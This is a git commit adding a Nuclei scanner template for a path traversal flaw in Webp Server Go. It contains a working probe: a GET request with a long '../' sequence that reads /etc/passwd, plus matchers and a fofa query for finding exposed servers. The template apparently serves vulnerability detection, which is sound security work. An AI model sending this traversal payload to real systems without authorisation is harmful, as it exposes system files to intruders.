Merge pull request #10727 from projectdiscovery/webp-server-lfi

Create webp-server-lfi.yaml
2024-09-10 23:00:53 +05:30 · 2024-09-10 23:00:53 +05:30 · 2543351a1c
parent 473b5af170 4f0de6466c
commit 2543351a1c
1 changed files with 29 additions and 0 deletions
--- a/http/vulnerabilities/other/webp-server-lfi.yaml
+++ b/http/vulnerabilities/other/webp-server-lfi.yaml
@ -0,0 +1,29 @@
+id: webp-server-lfi
+
+info:
+  name: Webp Server Go - Path Traversal
+  author: ritikchaddha
+  severity: high
+  description: |
+    Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.
+  reference:
+    - https://github.com/webp-sh/webp_server_go/issues/92
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: header="Webp-Server-Go"
+  tags: webp,webp-server,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd"
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body)"
+          - 'contains(server, "Webp-Server-Go")'
+          - "status_code == 200"
+        condition: and